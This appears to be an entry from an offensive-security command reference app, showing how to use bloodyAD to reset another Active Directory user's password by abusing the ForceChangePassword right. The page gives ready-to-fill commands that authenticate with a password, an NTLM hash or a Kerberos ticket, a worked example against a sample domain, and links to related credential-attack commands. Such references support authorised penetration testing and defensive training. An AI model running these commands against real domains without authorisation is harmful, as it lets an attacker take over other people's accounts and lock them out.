bloodyAD Set Password
Reset another user's password if you have ForceChangePassword (User-Force-Change-Password extended right) on them. Bread-and-butter ACL-abuse path — typically gained via BloodHound paths.
- Tool
- bloodyAD
- Category
- Credential Attacks / Password Manipulation
- Platform
- linux
- Requires
- password
- Protocols
- LDAP
Syntax
Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.
bloodyAD --host <dc-ip> -d <domain> -u <user> -p <password> set password <target_user> <new_password>
Credential variants
The same attack using a different authentication material.
NTLM Hash requires NTLM hash
bloodyAD --host <dc-ip> -d <domain> -u <user> -p :<hash> set password <target_user> <new_password>
Kerberos Ticket requires Kerberos ticket
KRB5CCNAME=<ccache> bloodyAD --host <dc-fqdn> -d <domain> -u <user> -k set password <target_user> <new_password>
Examples
bloodyAD --host 10.10.10.10 -d corp.local -u jdoe -p 'Password123!' set password svc_sql 'NewP@ssw0rd!'
Tags
References
Related commands
- bloodyAD add uac Toggle UserAccountControl flags on a target account. Setting DONT_REQ_PREAUTH on a user…
- BloodyAD Force Password Change Force password change using BloodyAD
- Impacket changepasswd Change an AD user's password via RPC (requires appropriate ACL rights)
- Impacket Get-GPPPassword Decrypt Group Policy Preference (GPP) passwords from XML files
- Net RPC Password Change Force password change via Net RPC
- NetExec change-password Module Reset a user's password when they are flagged STATUS_PASSWORD_MUST_CHANGE — typical…
- NetExec SMB GPP AutoLogin Search Group Policy Preferences for AutoLogon credentials stored in SYSVOL
- NetExec SMB GPP Password Search SYSVOL for Group Policy Preference XML files containing encrypted passwords